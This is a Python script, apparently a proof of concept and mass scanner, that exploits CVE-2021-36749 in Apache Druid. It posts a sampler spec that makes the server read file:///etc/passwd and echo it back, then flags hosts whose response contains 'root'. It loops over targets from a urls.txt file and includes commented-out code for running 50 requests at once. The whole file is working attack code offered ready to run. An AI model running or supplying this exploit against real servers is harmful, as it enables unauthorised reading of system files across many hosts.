# -*- coding: utf-8 -*-
import requests
# import threadpool
requests.packages.urllib3.disable_warnings()
def verify(urls):
    # CVE-2021-36749: Apache Druid's sampler API fetches arbitrary URIs,
    # including file:// paths, and echoes their contents in the response.
    url = urls + '/druid/indexer/v1/sampler?for=connect'
    print(url)
    headers = {
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36'
    }
    # Sampler spec pointing the HTTP firehose at a local file; the bogus
    # timestamp column plus missingValue keeps the parser from rejecting rows.
    data = {
        "type": "index",
        "spec": {
            "type": "index",
            "ioConfig": {
                "type": "index",
                "firehose": {"type": "http", "uris": ["file:///etc/passwd"]}
            },
            "dataSchema": {
                "dataSource": "sample",
                "parser": {
                    "type": "string",
                    "parseSpec": {
                        "format": "regex",
                        "pattern": "(.*)",
                        "columns": ["a"],
                        "dimensionsSpec": {},
                        "timestampSpec": {
                            "column": "!!!_no_such_column_!!!",
                            "missingValue": "2010-01-01T00:00:00Z"
                        }
                    }
                }
            }
        },
        "samplerConfig": {"numRows": 500, "timeoutMs": 15000}
    }
    try:
        res = requests.post(url, headers=headers, json=data, timeout=10,
                            verify=False, allow_redirects=False)
        # print(res.text)
        # /etc/passwd content in the response indicates a vulnerable target
        if 'root' in res.text:
            info = '[+] CVE-2021-36749 vulnerability found: ' + urls
            print(info)
    except Exception:
        pass
def get_url():
    # Load target URLs from urls.txt, one per line, skipping blank lines
    with open('urls.txt', 'r', encoding='UTF-8') as f:
        urls = f.readlines()
    urls = [url.strip() for url in urls if url and url.strip()]
    return urls
if __name__ == '__main__':
    urls = get_url()
    for url in urls:
        verify(url)
    # pool = threadpool.ThreadPool(50)
    # res = threadpool.makeRequests(verify, urls)
    # [pool.putRequest(req) for req in res]
    # pool.wait()
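# The commented-out block above relies on the unmaintained third-party
# threadpool package. A minimal concurrent sketch using only the standard
# library instead (assumes verify() and get_url() as defined in this script):
#
# from concurrent.futures import ThreadPoolExecutor
#
# if __name__ == '__main__':
#     urls = get_url()
#     with ThreadPoolExecutor(max_workers=50) as pool:
#         pool.map(verify, urls)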